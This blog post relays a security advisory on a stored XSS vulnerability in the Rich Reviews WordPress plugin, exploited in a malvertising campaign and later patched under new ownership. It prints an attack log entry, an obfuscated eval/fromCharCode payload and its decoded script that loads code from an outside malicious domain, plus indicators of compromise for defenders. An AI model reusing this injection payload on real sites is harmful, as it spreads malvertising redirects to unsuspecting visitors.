Update!: Rich Reviews WordPress plugin allows hackers to inject malvertising code to over 16,000 sites

NOTICE: SECURITY UPDATE – Rich Reviews plugin has been updated to version 1.8 and as such the security issues have been patched!

Tevya Washburn with the Starfish Reviews team contacted us with a new update about the Rich Reviews Plugin. Read our update blog: Rich Reviews WordPress Plugin under new ownership, Security vulnerabilities patched

His company Starfish Reviews has taken the plugin from the original developers and updated it. It had several major security vulnerabilities in 1.6.5 and previous versions, that went unresolved for several years. Those vulnerabilities were being exploited to install malware on some WordPress websites using this plugin.

All the vulnerabilites have been quickly fixed in the updated version 1.8 with a complete re-write of the options interface (where the worst vulnerabilities existed). !

You can get their detailed blog post about the history of this plugin, adoption and fixes, and an additional security information on the new page for Rich Reviews.  For verification you check Nuanced Media, the original owner’s update post, confirming its takeover.

The Wordfence Threat Intelligence team  has released a report that it is tracking a series of attacks against an unpatched vulnerability in the Rich Reviews plugin for WordPress.

The estimated 16,000 sites running the plugin are vulnerable to unauthenticated plugin option updates, which can be used to deliver stored cross-site scripting (XSS) payloads.

Description: XSS Via Unauthenticated Plugin Options Update
Affected Plugin: Rich Reviews
Affected Versions: <= 1.7.4
CVSS Score: 8.3 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

Attackers are currently abusing this exploit chain to inject malvertising code into target websites. The malvertising code creates redirects and popup ads. Our team has been tracking this attack campaign since April of this year. You can find additional research covering this attack campaign, published by us in April and again in August of this year.

The Wordfence firewall already has built-in rules that reliably block the XSS injections in this campaign, both for Premium users and those who haven’t upgraded yet. In addition to this, we have released a new firewall rule for our Premium customers to prevent attackers from making configuration changes, such as removing the need for review approval, or defacing certain text elements.

This new Wordfence firewall rule prevents manipulation of the plugin’s settings and has been automatically deployed to our Wordfence Premium customers. The new rule will be released to free users within 30 days.

The plugin’s developers are aware of this vulnerability, but there is no patch currently available. Please see our notes on disclosure below. We recommend users find an alternative solution as soon as possible, or remove the Rich Reviews plugin from your site.

The vulnerability in this plugin is being actively exploited. The Wordfence team is seeing this in our attack data and our Security Services Team has assisted customers of the site cleaning service who have had their site compromised by an attacker who exploited this vulnerability.

The Attack Campaign

While performing forensic review of an infected site, a security analyst with the Wordfence site cleaning team identified suspicious log activity associated with the Rich Reviews plugin.

1 183.90.250.26 - [redacted] "POST /wp-admin/admin-post.php?page=fp_admin_options_page HTTP/1.0" 200 - "-" "-"

An interesting note regarding this log entry is the inclusion of the plugin’s admin-post.php page string. This type of request is commonly seen in cases where an is_admin check is improperly used to test a user’s permissions, such as in this example from earlier this year. However, that workaround is unnecessary in this case, where all incoming requests are checked for options updates regardless of path.

The payloads injected by these attackers are directly associated with a malvertising campaign we’ve reported on previously:

1 eval(String.fromCharCode(118,
97, 114, 32, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99,
117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101,
109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 10,
115, 99, 114, 105, 112, 116, 46, 111, 110, 108, 111, 97, 100, 32, 61,
32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 125, 59,
10, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 32, 61, 32, 34, 104,
116, 116, 112, 115, 58, 47, 47, 97, 100, 115, 110, 101, 116, 46, 119,
111, 114, 107, 47, 115, 99, 114, 105, 112, 116, 115, 47, 112, 108, 97,
99, 101, 46, 106, 115, 34, 59, 10, 100, 111, 99, 117, 109, 101, 110,
116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121,
84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91,
48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40,
115, 99, 114, 105, 112, 116, 41, 59));

The obfuscated payload above executes the following script:

1 var script = document.createElement('script');
2 script.onload = function() {
3 };
4 script.src = "https://adsnet.work/scripts/place.js";
5 document.getElementsByTagName('head')[0].appendChild(script);

This XSS payload is nearly identical to those identified in this campaign before. The sourced third-party script place.js is similar to others we’ve seen in this malvertising campaign as well, which could trigger popup ads and unwanted redirects.

Catch our news on plugins and security

Indicators of Compromise (IOCs)

Our Threat Intelligence Team releases indicators of compromise where feasible so that other security vendors can add detection capability to their products and provide protection to their customers. The following are IOCs that we have observed associated with this attack campaign.

IP Addresses

The following IP addresses are linked to malicious activity against this vulnerability:

  • 94.229.170.38
  • 183.90.250.26
  • 69.27.116.3

Domain Names

  • adsnet.work – Hosts malicious scripts sourced by XSS injections.
    • Outbound DNS requests to this domain suggest a user on your network may have triggered a potentially dangerous redirect.

Database Content

Injected content will be present in the options table of your WordPress database, with the name rr_options.

Conclusion

Rich Reviews, a plugin with an estimated 16,000 users, was removed from the WordPress plugin repository in March for security reasons. The current version of the plugin contains a highly exploitable options update vulnerability that can be used to inject a stored XSS payload into vulnerable sites. We have identified a known malvertising campaign abusing vulnerable sites in order to deliver popup ads and potentially dangerous redirects.

Wordfence users, both Premium and those still on Free, are already protected from the attacks in this campaign due to the firewall’s robust XSS protection. There is potential for non-XSS abuse of this vulnerability, however, which has prompted us to release a new firewall rule. Wordfence Premium users have received an automatic update containing this new rule, while free users will receive an  update in thirty days.

The plugin’s developers have acknowledged the presence of these issues, but have provided an estimate of two weeks to resolve these vulnerabilities. Due to the length of this patch process and in light of the fact that the plugin has been removed from the official WordPress plugin repository, it is recommended that Rich Reviews users find an alternative solution to ensure the security of their sites.

Please consider sharing this post to help create awareness of this security issue.

Read more from the Wordfence report

Update:

Tevya Washburn CEO of Starfish Reviews also informed us that before deploying to the WordPress plugin repo, the new owners Starfish Reviews ran the updated and secured code through the WordFence’s scanner on their testing site, SonarCloud analyzer. The WordPress.org Plugins team has done their own code audit before reopening the plugin. The plugin has now been reopened on WordPress.org, (link here).

Subscribe to Blog via Email

Enter your email address to subscribe to this blog and receive notifications of new posts by email.

Join 152 other subscribers

%d bloggers like this: